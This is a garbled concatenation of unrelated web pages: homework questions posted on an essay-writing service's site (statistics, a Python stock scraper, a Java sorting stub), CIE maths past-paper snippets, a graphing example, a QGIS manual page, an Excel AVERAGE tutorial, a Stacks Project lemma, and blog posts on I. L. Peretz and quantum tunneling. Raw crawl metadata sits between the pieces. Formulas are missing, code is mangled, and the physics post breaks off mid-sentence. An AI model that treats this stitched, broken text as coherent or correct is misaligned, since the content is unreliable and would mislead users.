Test this claim at a 1% level of significance. For this test, assume that the population standard deviation for relative skill level is unknown. -The dataframe for your team is called your_team_df. -The variable ‘pts’ represents the points scored by your team. -Calculate and print the mean points scored by your team during the years you picked. -Identify the mean score under the null hypothesis. You only have to identify this value and do not have to print it. (Hint: this is given in the problem statement) -Assuming that the population standard deviation is unknown, use Python methods to carry out the hypothesis test. -Calculate and print the test statistic rounded to two decimal places. -Calculate and print the P-value rounded to four decimal places.\n\n## Python : The CNN Money’s Market Movers website (money.cnn.com/data/hotstocks/ )", null, "Question Python : The CNN Money’s Market Movers website (money.cnn.com/data/hotstocks/ ) tracks the most active stocks on a real time basis. Specifically, the most active, the top gainers andtop losers are listed at any instance in time. Write Python scripts that collect the list ofmost actives, gainers and losers from the above website. Next, programs should take the tickersymbols and names of these companies (and categories) and build a csv file (called stocks.csv) withdata about each stock from the website: finance.yahoo.com/quote/AMD?p=AMD\n\n## How can I include an attachment? I need corrections on a flowchart provided.\n\nQuestion How can I include an attachment? I need corrections on a flowchart provided. Suppose matinee movie tickets are priced at \\$5.50 each for movies BEFORE 6:00 PM (less than), and \\$10.00 each after that time. The following program flowchart was designed to prompt the user for the time of the movie and how many tickets the user wishes to purchase, then makes and displays the price using the correct calculation. (For this problem, do not worry about AM versus PM.)However, there are a number of errors. Use the directions posted in this folder and make the corrections.\n\nQuestion Using pandas\nClick on the following link and download the dataset. The dataset contains information about more than 37000 bank accounts. https://www.dropbox.com/s/j41kxvjc6uraurn/Banking Dataset.csv?dl=0Describe all the numeric variables. • The duration variable have very small and very large numbers. create a new column and divide all the duration values by 30 and add it to that new column (call this column ‘duration_month’). In fact you are creating a new column in which you can see the duration in months. To learn how to add a new calculated column to a pandas dataframe open the following link. https://stackoverflow.com/questions/18504967/pandas-dataframe-create-new-columns-and-fill-with-calculated-values-from-same-df\n\n## The program accepts a student’s data as follows: GID number\n\nQuestion The program accepts a student’s data as follows: GID number first and last name major field of study grade point averageDisplay the words, “HONOR ROLL” if the student’s grade point average is 3.0 or better. The input comes from the keyboard, not a file, and an array is not needed. 
Please find and correct the errors according to the direction in this folder.start declarations num gid num firstName num lastName num majorStudy num gpa num QUIT = “YES” num quitNow housekeeping() while quitNow QUIT processLoop() endwhile eoj()stop housekeeping() quitNow=”N”return processLoop()input gidinput firstNameinput lastNameinput majorStudyinput GPAif gpa<=3.0output \"HONOR ROLL\"endifoutput \"Do you want to quit? Y or N?\" eoj() output \"End of program.\"stop\n\n## Hello, looking for help on this Java program below: import java.util.Random;\n\nQuestion Hello, looking for help on this Java program below: import java.util.Random; /** This class compares the efficiency of Selection Sort, Insertion Sort, Shell Sort, Other Shell Sort, Bubble Sort, and Better Bubble Sort. @author */public class SortComparisons{ private int counter; private Random r; private int[] list1, list2, list3, list4, list5, list6; public SortComparisons() { counter = 0; r = new Random(); testComparisons(); } /** Tests the number of comparisons between the different sorting algorithms. */ public void testComparisons() { for (int x = 2; x <= 4096; x *= 2) { populateLists(x); System.out.println(\"With arrays of size \" x \"…\"); counter = 0; selectionSort(list1, 0, x – 1); System.out.println(\"Selection Sort makes \" counter \" comparisons\"); counter = 0; insertionSort(list2, 0, x – 1); System.out.println(\"Insertion Sort makes \" counter \" comparisons\"); counter = 0; shellSort(list3, 0, x – 1); System.out.println(\"Shell Sort makes \" counter \" comparisons\"); counter = 0; otherShellSort(list4, 0, x – 1); System.out.println(\"A modified Shell Sort makes \" counter \" comparisons\"); counter = 0; bubbleSort(list5, 0, x – 1); System.out.println(\"A Bubble Sort makes \" counter \" comparisons\"); counter = 0; betterBubbleSort(list6, 0, x – 1); System.out.println(\"A better Bubble Sort makes \" counter \" comparisons\"); System.out.println(); } // end for } // end testComparisons /** Fills each list with random integers in the same order. @param size The number of random integers to fill in. */ public void populateLists(int size) { list1 = new int[size]; list2 = new int[size]; list3 = new int[size]; list4 = new int[size]; list5 = new int[size]; list6 = new int[size]; int index = 0; while (index 0. */ public void selectionSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method getIndexOfSmallest. } // end selectionSort // Finds the index of the smallest value in a portion of an array a. // Precondition: a.length > last >= first >= 0. // Returns the index of the smallest value among // a[first], a[first 1], . . . , a[last]. private int getIndexOfSmallest(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD } // end getIndexOfSmallest /** Sorts using the recursive Insertion Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void insertionSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method insertInOrder. } // end insertionSort // Inserts an element into the appropriate location in the given // array, between first and last. private void insertInOrder(int element, int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD } // end insertInOrder /** Sorts using the Shell Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. 
@param last The index of the last element to sort. */ public void shellSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method incrementalInsertionSort. } // end shellSort /** Sorts equally spaced elements of an array into ascending order, used for shell sort. @param a an array of Comparable objects. @param first An integer >= 0 that is the index of the first array element to consider. @param last An integer >= first and < a.length that is the index of the last array element to consider. @param space The difference between the indices of the elements to sort. */ private void incrementalInsertionSort(int[] a, int first, int last, int space) { // ADD CODE HERE TO MISSING METHOD } // end incrementalInsertionSort /** Sorts using the modified Shell Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void otherShellSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the method incrementalInsertionSort. } // end otherShellSort /** Sorts using the Bubble Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void bubbleSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method order. } // end bubbleSort // Swaps the array the array entries a[i] and a[j] if necessary private void order(int[] a, int i, int j) { // ADD CODE HERE TO MISSING METHOD } // end order // ——————————————————————————- /** Sorts using a better Bubble Sort algorithm. @param a The array to sort. @param first The index of the first element to sort. @param last The index of the last element to sort. */ public void betterBubbleSort(int[] a, int first, int last) { // ADD CODE HERE TO MISSING METHOD // using the private method swap. } // end betterBubbleSort // Swaps the array entries a[i] and a[j]. private static void swap(int[] a, int i, int j) { int temp = a[i]; a[i] = a[j]; a[j] = temp; } // end swap // Tests various sorting methods public static void main(String[] args) { new SortComparisons(); } // end main} // end SortComparisons\n\n### Essay Writing at AllEssays.Online\n\n4.9 rating based on 17,037 ratings\n\n17037 reviews\n\nReview This Service\n\nRating:" ]
[ null, "https://allessays.online/wp-content/uploads/2020/05/tUMLUVNL7mLbFO3sDXcq.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69525814,"math_prob":0.77173334,"size":11698,"snap":"2021-31-2021-39","text_gpt3_token_len":2800,"char_repetition_ratio":0.11604241,"word_repetition_ratio":0.24919441,"special_character_ratio":0.2586767,"punctuation_ratio":0.14521301,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9590745,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-04T00:19:35Z\",\"WARC-Record-ID\":\"<urn:uuid:fdc07ebc-bf35-4271-8d8a-a2f967a55b0e>\",\"Content-Length\":\"83925\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:190d1d35-45fa-42af-9306-58a8d9aa6ae4>\",\"WARC-Concurrent-To\":\"<urn:uuid:d68a62ca-ea4e-4a88-814d-2a1404bb4d1c>\",\"WARC-IP-Address\":\"162.213.255.18\",\"WARC-Target-URI\":\"https://allessays.online/design-and-write-an-object-oriented-program-in-c-that-meets-the/\",\"WARC-Payload-Digest\":\"sha1:CJEOYB7QHTHYNOC656BC52JDF4DTK6AI\",\"WARC-Block-Digest\":\"sha1:5SXEX6PKIT53XX6YQYZXC5UF67QVEF6W\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154486.47_warc_CC-MAIN-20210803222541-20210804012541-00249.warc.gz\"}"}
https://oalevelsolutions.com/tag/polynomials-cie-p2-2009/
[ "# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | May-Jun | (P2-9709/02) | Q#8\n\nQuestion a)   Find the equation of the tangent to the curve at the point where . b)                  i.       Find the value of the constant A such that           ii.       Hence show that Solution a.     We are given that curve with equation  and […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | Oct-Nov | (P2-9709/22) | Q#5\n\nQuestion The polynomial , where a is a and b are constants, is denoted by . It is given that  and (x − 2) are factors of p(x). i.       Find the values of a and b.    ii.       When a and b have these values, find the other linear factor of p(x). […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | Oct-Nov | (P2-9709/21) | Q#3\n\nQuestion The polynomial , where a is a constant, is denoted by . It is given that  is a factor of . i.Find the value of  .    ii. When  has this value, factorise  completely. Solution      i.  We are given that;    We are also given that is a factor of . We […]\n\n# Past Papers’ Solutions | Cambridge International Examinations (CIE) | AS & A level | Mathematics 9709 | Pure Mathematics 2 (P2-9709/02) | Year 2009 | May-Jun | (P2-9709/02) | Q#6\n\nQuestion The polynomial , where a and b are constants, is denoted by . It is given that   is a factor of , and that when  is divided by    the remainder is 4. i.       Find the values of  and . ii.       When  and  have these values, find the other two […]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8245016,"math_prob":0.94030935,"size":384,"snap":"2022-05-2022-21","text_gpt3_token_len":108,"char_repetition_ratio":0.118421055,"word_repetition_ratio":0.0,"special_character_ratio":0.328125,"punctuation_ratio":0.056338027,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9950454,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T04:24:29Z\",\"WARC-Record-ID\":\"<urn:uuid:40aa1d85-8c1c-4505-9c37-836dcb12e8d2>\",\"Content-Length\":\"39063\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ec1f5d76-6cd2-48d9-b9a7-c4d3a3fca922>\",\"WARC-Concurrent-To\":\"<urn:uuid:1345d683-2a64-4373-950f-0a5aa79584fc>\",\"WARC-IP-Address\":\"68.65.122.178\",\"WARC-Target-URI\":\"https://oalevelsolutions.com/tag/polynomials-cie-p2-2009/\",\"WARC-Payload-Digest\":\"sha1:3RH7VL37XH63PJMAFRRZ5VLY6KN4IBBG\",\"WARC-Block-Digest\":\"sha1:34KXAXLHRV5FEUCWS2MY6BRRGPY6XXYP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662521041.0_warc_CC-MAIN-20220518021247-20220518051247-00018.warc.gz\"}"}
https://www.teachoo.com/8418/2137/Example-6/category/Examples/
[ "Examples\n\nChapter 13 Class 8 Introduction to Graphs\nSerial order wise", null, "", null, "Learn in your speed, with individual attention - Teachoo Maths 1-on-1 Class\n\n### Transcript\n\nExample 3 (Quantity and Cost) - Chapter 15 Class 8 Introduction to Graphs The following table gives the quantity of petrol and its cost. No. of liters of petrol | 10 | 15 | 20 | 25 Cost of petrol in rupees | 500 | 750 | 1000 | 1250 Plot a graph to show the data. Plotting graph Putting Cost in rupees in y-axis, from 100 to 1300 and Liters of petrol in x-axis, from 5 to 30 We plot points, and join the line", null, "" ]
[ null, "https://d1avenlh0i1xmr.cloudfront.net/4eab09bd-754a-4af1-b375-6efb0a39c29e/slide24.jpg", null, "https://d1avenlh0i1xmr.cloudfront.net/d743eae8-98f4-4433-917a-5de303f9d1da/slide25.jpg", null, "https://www.teachoo.com/static/misc/Davneet_Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8951429,"math_prob":0.6894768,"size":952,"snap":"2023-14-2023-23","text_gpt3_token_len":286,"char_repetition_ratio":0.14873418,"word_repetition_ratio":0.18539326,"special_character_ratio":0.3119748,"punctuation_ratio":0.043956045,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96531874,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,5,null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T13:15:40Z\",\"WARC-Record-ID\":\"<urn:uuid:5045ad2e-5511-4332-997f-2cfd7c3a5c7c>\",\"Content-Length\":\"161414\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d805a59-4f7a-4f49-a889-68427c4a8153>\",\"WARC-Concurrent-To\":\"<urn:uuid:17f09358-6e44-43ea-a0e2-1acb60c3695f>\",\"WARC-IP-Address\":\"104.21.90.10\",\"WARC-Target-URI\":\"https://www.teachoo.com/8418/2137/Example-6/category/Examples/\",\"WARC-Payload-Digest\":\"sha1:XNPJN3YUATB5TDYFHYNLQIP3I577ETDL\",\"WARC-Block-Digest\":\"sha1:O2W2ZJL5K4ZQFLTTA2CLCNLH2X32SBN5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649986.95_warc_CC-MAIN-20230604125132-20230604155132-00671.warc.gz\"}"}
https://semiautomaticclassificationmanual.readthedocs.io/en/latest/neighborPixelsTab.html
[ "# 3.4.3.11. Neighbor pixels¶\n\nThis tool allows for the calculation of several neighbor pixels statistics for every band of a band set defined in the Band set.\n\nThe statistics are calculated for every pixel of the input raster considering the values of the neighbor pixels. Neighbor pixels are defined through a distance or through a custom matrix.\n\nFor example, the following matrix represents the neighbor pixels within a distance of 1 pixel from a central pixel, resulting in a 3x3 matrix.\n\n Neighbor Neighbor Neighbor Neighbor Center Neighbor Neighbor Neighbor Neighbor\n\nSeveral statistics are available. The statistic Sum will result in a raster convolution. For instance, this can be useful to apply an image filter to all the bands a band set for photointerpretation.\n\nAn output band is created for every band in the band sets.\n\n## 3.4.3.11.1. Neighbor pixels¶\n\nResulting in the following matrix:\n\n NoData 1 NoData 1 1 1 NoData 1 NoData" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80395603,"math_prob":0.9853156,"size":2255,"snap":"2022-27-2022-33","text_gpt3_token_len":543,"char_repetition_ratio":0.14526877,"word_repetition_ratio":0.010666667,"special_character_ratio":0.22616407,"punctuation_ratio":0.16122004,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99082077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T13:41:24Z\",\"WARC-Record-ID\":\"<urn:uuid:86f7df20-4c57-41dd-ba73-919843bf7667>\",\"Content-Length\":\"18217\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:820398a7-3f32-4900-93da-d5d60f84a1e2>\",\"WARC-Concurrent-To\":\"<urn:uuid:d71b5c37-03dc-4809-95cd-7f9cbb853e6e>\",\"WARC-IP-Address\":\"104.17.32.82\",\"WARC-Target-URI\":\"https://semiautomaticclassificationmanual.readthedocs.io/en/latest/neighborPixelsTab.html\",\"WARC-Payload-Digest\":\"sha1:NXQDKXD3UBU62VW7OJQBCBPBY2IPR3GY\",\"WARC-Block-Digest\":\"sha1:BIGNC3XM2SUH2HZDGPU5H3BXAK5FBVVY\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104576719.83_warc_CC-MAIN-20220705113756-20220705143756-00001.warc.gz\"}"}
https://www.wps.com/academy/how-to-use-average-function-in-excel-on-mac-quick-tutorials-1864502/
[ "# How to use average function in excel on mac\n\nJuly 26, 2022\n624 Views\n0\n\nA free Office suite fully compatible with Microsoft Office\n\nThe average (arithmetic mean) of a set of numbers is determined by Excel's AVERAGE function. The AVERAGE function disregards logical values, blank cells, and text-filled cells.\n\nThe Excel Statistical functions section includes the AVERAGE Function. In Excel, it will return the mean value of the supplied set of numbers. In Excel, the function is used to determine the arithmetic mean of a set of inputs. This tutorial will walk you through each step of computing the average in Excel. The function is helpful to a financial analyst in determining the average (mean) of a set of statistics. For instance, we can discover the average revenue for a company over the previous 12 months.\n\nAverage function in excel online, 2016 and 2019\n\nUse SUM and COUNT instead of the AVERAGE function.\n\nThe AVERAGE function, for instance, determines the average of the values in cells A1 through A3 in the example below.\n\n1.The same outcome is obtained using the formula below.\n\n2.The average of the values in cells A1 through A3 and the number 8 is determined by the following AVERAGE function.\n\n3.The AVERAGE function disregards text-filled cells, empty cells, and logical values (TRUE or FALSE).\n\nAverageA function in excel\n\n1.The average (arithmetic mean) of a set of numbers is another result of the AVERAGEA function. However, the logical value TRUE evaluates to 1 while the logical values FALSE and cells with text evaluate to 0. Additionally ignoring empty cells is the AVERAGEA function.Look at the AVERAGEA function below as an illustration.\n\n2.You can verify this outcome using the standard AVERAGE function.\n\nAverage top 3 in excel\n\n1.To determine the average of the top 3 figures in a data set, use Excel's AVERAGE and LARGE functions.The first step is to determine the average of the values in cells A1 through A6 using the AVERAGE function below.\n\n2.Use the LARGE function, for instance, to determine the third-largest number.\n\n3.The average of the top three numbers is calculated using the formula below.\n\n4.The array constant 20,15,10 is returned by the LARGE function, as explained. The AVERAGE function receives this array constant as an argument, returning a value of 15.\n\nAverage If function in excel\n\n1.Use Excel's AVERAGEIF function to determine the average of all cells that satisfy a particular criterion.\n\nNote: This above written article is an attempt to show you how to use average function in excel online, 2016 and 2019, in both windows and mac.You just need to have a little understanding of how and which way things work and you are good to go. With having this basic knowledge or information of how to use it, you can also access and use different other options on excel or spreadsheet. Also, it is very similar to Word or Document. So, in a way, if you learn one thing, like Excel, you can automatically learn how to use Word as well because both of them are very similar in so many ways. If you want to know more about WPS Office, you can download WPS Office to access, Word, Excel, PowerPoint for free." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86942834,"math_prob":0.8835786,"size":3489,"snap":"2022-40-2023-06","text_gpt3_token_len":777,"char_repetition_ratio":0.17360115,"word_repetition_ratio":0.062809914,"special_character_ratio":0.22098023,"punctuation_ratio":0.11522049,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T17:03:43Z\",\"WARC-Record-ID\":\"<urn:uuid:acc617b1-a3f9-4aad-bdf5-e7e859708b17>\",\"Content-Length\":\"122142\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:63517318-abd4-4dd3-9b18-c4015f9b319e>\",\"WARC-Concurrent-To\":\"<urn:uuid:2c114422-9dbd-4871-9136-c30e3dc51f3a>\",\"WARC-IP-Address\":\"108.138.85.7\",\"WARC-Target-URI\":\"https://www.wps.com/academy/how-to-use-average-function-in-excel-on-mac-quick-tutorials-1864502/\",\"WARC-Payload-Digest\":\"sha1:ZJZ4OYZKJSM6O2CUBMWGKGEDKMMRTVD2\",\"WARC-Block-Digest\":\"sha1:ET3DTCKHGWZUMGMBS4VZ767PIZB2ACE4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499888.62_warc_CC-MAIN-20230131154832-20230131184832-00057.warc.gz\"}"}
https://stacks.math.columbia.edu/tag/005Z
[ "For Jacobson spaces, closed points see everything about the topology.\n\nLemma 5.18.7. Suppose $X$ is a Jacobson topological space. Let $X_0$ be the set of closed points of $X$. There is a bijective, inclusion preserving correspondence\n\n$\\{ \\text{finite unions loc.\\ closed subsets of } X\\} \\leftrightarrow \\{ \\text{finite unions loc.\\ closed subsets of } X_0\\}$\n\ngiven by $E \\mapsto E \\cap X_0$. This correspondence preserves the subsets of locally closed, of open and of closed subsets.\n\nProof. We just prove that the correspondence $E \\mapsto E \\cap X_0$ is injective. Indeed if $E\\neq E'$ then without loss of generality $E\\setminus E'$ is nonempty, and it is a finite union of locally closed sets (details omitted). As $X$ is Jacobson, we see that $(E \\setminus E') \\cap X_0 = E \\cap X_0 \\setminus E' \\cap X_0$ is not empty. $\\square$\n\n## Comments (2)\n\nComment #1117 by Simon Pepin Lehalleur on\n\nSuggested slogan: For Jacobson spaces, closed points see everything about the topology.\n\nComment #6241 by Matthieu Romagny on\n\nIn the two bracketted sets of the statement, the backslashes are visible but they shouldn't be, I guess ?\n\nThere are also:\n\n• 8 comment(s) on Section 5.18: Jacobson spaces\n\n## Post a comment\n\nYour email address will not be published. Required fields are marked.\n\nIn your comment you can use Markdown and LaTeX style mathematics (enclose it like $\\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar).\n\nUnfortunately JavaScript is disabled in your browser, so the comment preview function will not work.\n\nAll contributions are licensed under the GNU Free Documentation License.\n\nIn order to prevent bots from posting comments, we would like you to prove that you are human. You can do this by filling in the name of the current tag in the following input field. As a reminder, this is tag 005Z. Beware of the difference between the letter 'O' and the digit '0'." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.828191,"math_prob":0.7573987,"size":945,"snap":"2021-21-2021-25","text_gpt3_token_len":273,"char_repetition_ratio":0.12221041,"word_repetition_ratio":0.051612902,"special_character_ratio":0.2867725,"punctuation_ratio":0.11235955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96800345,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T07:20:49Z\",\"WARC-Record-ID\":\"<urn:uuid:0f9f526f-cbd7-44a1-a4bd-ffde665c14b2>\",\"Content-Length\":\"15666\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0736d489-acd7-4569-a9c4-5a5596432a65>\",\"WARC-Concurrent-To\":\"<urn:uuid:bb2aeb65-937e-4962-a364-9a9e94d4dea6>\",\"WARC-IP-Address\":\"128.59.222.85\",\"WARC-Target-URI\":\"https://stacks.math.columbia.edu/tag/005Z\",\"WARC-Payload-Digest\":\"sha1:NFKKQMBBJRZAA7TJMUBAQGB7BFIKFTYJ\",\"WARC-Block-Digest\":\"sha1:2TVYBFCHYKMH5HRCLD35SZRSX6KYYECE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622113.11_warc_CC-MAIN-20210625054501-20210625084501-00524.warc.gz\"}"}
https://marty-green.blogspot.com/2015/
[ "## Thursday, June 25, 2015\n\n### Polish Guy Singing \"Crazy\"\n\nJacek (that's YAH-tsek, but you can call him Jack) is a friend of mine who takes part in a Thursday evening rehearsal session downtown that I lead at a program called ArtBeat. I think this is a phenomenal version of Crazy, the Patsy Cline signature song. (Not everyone knows that Willie Nelson wrote it.) I helped a little with the arrangement on this, but despite our best efforts the two patch changes on the instrumental solo were kind of surprising to us (as you might be able to tell from Jacek's facial expression.)\n\nIf you like this video, pass it on to your friends.\n\n## Saturday, April 4, 2015\n\n### I. L. Peretz 100th Yohrzeit\n\nToday is the 100th anniversary of the death of Yiddish writer I. L. Peretz. They say that a hundred thousand people thronged the streets of Warsaw for his funeral.\n\nPeretz was, in his best moments, a genius without parallel in the Yiddish world. I've had a personal role in trying to keep Peretz's work alive. It's brilliant work and it's actually important if you care at all about who you are and where you came from. Of course, not everyone sees it that way. In fact, my work hasn't been much appreciated in the Jewish world. But at least I've done something.\n\nMy biggest project was my musical setting of Peretz's epic poem \"The Ballad of Monsich\". You can see it on Youtube here:\n\nThis was taken from the Winnipeg Fringe Festival in 2005, and there's actually eleven videos. This is the first one, but if you want the whole playlist, it should link from here.\n\nBut I almost forgot one other project I did, which was an incredibly chilling poem about power and hypocrisy called Solomon's Throne, which still rings true today. It was never published anywhere, and so I thought it would be fitting on this, the 100th anniversary of Peretz's death, to post it on the internet. You can link to the PDF here: it includes the transcribed Yiddish (using German spelling) side-by-side with the English translation.  I'm going to say without modesty that my translation is pretty f#%\\$ing brilliant.\n\n## Tuesday, February 3, 2015\n\n### Penetrating the Barrier: Some Calculations\n\nYesterday I calculated the difference between the two ground states of the double well (the infinte well with a finite barrier in the middle.) The two states were of course the symmetric and the antisymmetric cases, with the antisymmetric having a slightly higher energy:\n\nI picked a wavelength of 44 angstroms (7 angstroms = 1 radian) for the sine wave, and a decay length of 2 angstroms for the exponential region, so the ration of the two parameters was 7:2. And then I picked the dimensions of the box so that the waves would just fit inside. And that's pretty much all you need to do the calculation. The Wikipedia formula asks you to calculate the transmission coefficient in terms of E and V, the energies in the two zones respectively, but the formula they give is a bit redundant...you can re-express it just in terms of the ratio (7:2 in this case) of the two characteristic lengths:\nYou can see I've got r = 7/2, and ka = 4, so plugging in the numbers, we get a transmission coefficient of 1/2483, or close to 0.04%.   Is this the same as I got using the steady state solutions?\n\nYesterday I calculated that the wavelengths of the symmetric and antisymmetric modes were different by 0.4% (about one part in 250). But in quantum mechanics wavelength is momentum, and energy is frequency (momentum squared). 
So the frequencies are different by one part in 125.\n\nHere is where it gets interesting. You start out with the electron all on one side of the barrier. How do you do that? By having the symmetric and antisymmetric modes in phase so they re-inforce on the left and cancel on the right. After 125 cycles, they will be back in phase again. But after 62.5 cycles, the relative phases will be reversed...so all the wave function will be on the right hand side.\n\nIs this the same result as we got from the Wikipedia formula? It's hard to say, because the Wikipedia formula is expressed in terms of the Copenhagen interpretation as the \"probability\" of a particle getting through the barrier. Where is my \"particle\" in terms of standing waves?\n\nWell, one way to interpret it would be to imagine the particle bouncing back and forth in the potential well. If it bounces once on each cycle, that means after hitting the wall 62 times, it gets completely through to the other side. That's like a 1.5% penetration on each cycle...more like 3% or 4%, actually, because there's the competing probability of it returning from whence it came. That's a lot more than the Wikipedia calculation. Have we done something wrong?\n\nIt's actually not quite that bad. Remember in quantum mechanics there's a discrepancy between the phase velocity and the group velocity. For electrons, the group velocity is twice the phase velocity. We've been treating the electron as though it travels with the phase velocity of the wave function...it's actually twice that, so where we thought it was hitting the wall 62.5 times, it was actually 125 times. So our nominal penetration ration goes down by half, to below one percent. That's a little better, but still a long way off. What gives?\n\nThere is a fascinating answer to this question, and it gives us a very deep insight into the whole subject of quantum resonance. We said that each time an electron strikes the barrier, it has a 1/2500 chance of getting through. But what does this mean in terms of the wave function? It means the amplitude of the transmitted function is one fiftieth. The power goes as the amplitude squared.\n\nIn the coupled well system, the transmitted wave is in phase each time it re-strikes. So the amplitude on the transmitted side goes as one fiftieth, two fiftieths, three fiftieths, etc. After only fifty strikes, it is 100 percent through!\n\nNot exactly....because once the amplitude starts building up on the right hand side, there is the probability that it will come back through the other way. But early in the game, that probability is negligible. So while the amplitude is growing as 1/50, 2/50, 3/50....   the probability is growing as 1/2500, 4/2500, 9/2500... in other words, it is growing parabolically.\n\nHow close does this parabola fit to the sine wave which represents the oscillating probability? Pretty close, as it turns out. I'm not going to do it in detail, but if you look at the Taylor Expansion for the cosine function, the x-squared term projects to -1 at when x = 1.41 radians (the square root of two. On our sine wave, where 125 strikes (the electron striking the wall) makes is a half-cycle, that comes to 56 strikes.\n\nIt's pretty close.\n\n### Quantum Tunneling: A Different KInd of Calculation\n\nI did some interesting physics yesterday so I thought I should write it up. The question was about quantum tunneling. It came from my friend's 3rd year Physical Electronics course in Electrical Engineering. 
You had a MosFET with a silicon dioxide insulating layer between the gate and the channel. They gave you the the barrier potential in the insulator, and told you to assume an electron with a certain energy (less than the barrier potential) in the gate. What was the \"probability\" or rate of tunneling?\n\nThis is a pretty standard problem which you can look up on Wikipedia. You calculate the form of the free-electron solutions in all three regions and match up the boundary condition. It's a little messy but it works.\n\nI thought I could do better. The problem is messy because the conditions are different on the left and right hand sides. So I came up with the idea of working with symmetries. Instead of taking a freely propagating wave from the left and following it through the barrier, I put the whole thing inside a bigger potential well and considered the steady state solutions. Of course there are two minimum-energy solutions: the symmetric and the anti-symmetric, separated by a very tiny energy difference.\n\nI don't like to carry too many letter symbols so I picked numbers that would come out nicely. From the terms of the problem, it's easy to calculate the free-propagation constants in both regions. So I allowed myself to tweak the problem parameters so the propagation constants come out to nice integers. Assuming pi = 22/7, here is the problem as I set it up:\n\nYou see I gave the well a width of 20 (you can call it 20 Angstroms if you like or 20 millimeters, it won't matter in the end...it's all about the geometry.) Can you see why this fits the sine wave perfectly? It's because the wave penetrates into the barrier. I've assumed that the penetration length is 2, so 20+2=22 and everything fits. The anti-symmetric solution is the same basic idea:\n\nYou can see I set it up so that there is a wavelength of 44, which fits perfectly into the box. But actually that's a bit of a cheat. If I were matching up a sine wave to an exponential at the boundary, then I would indeed get a wavelength of exactly 44, because of the well-known property of an exponential whereby the projection of the slope intersects the x-axis at exactly the decay length (I'm also assuming the sine wave is in the small-angle regime where sin(x)=x):\n\nI don't really care about the constant in front of the sine wave, but I just threw it in here to show that it's easy. I used the property of sine waves that the projection of the tangent from the zero-crossing reaches the altitude of the sine wave after one radian. The point is that if I'm matching my sine wave (period = 44) to an exponential (decay length = 2) then this is how they line up. Everything fits.\n\nExcept I'm not exactly matching the sine wave to an exponential. I'm matching it to cosh (in the symmetric case) and sinh (in the antisymmetric 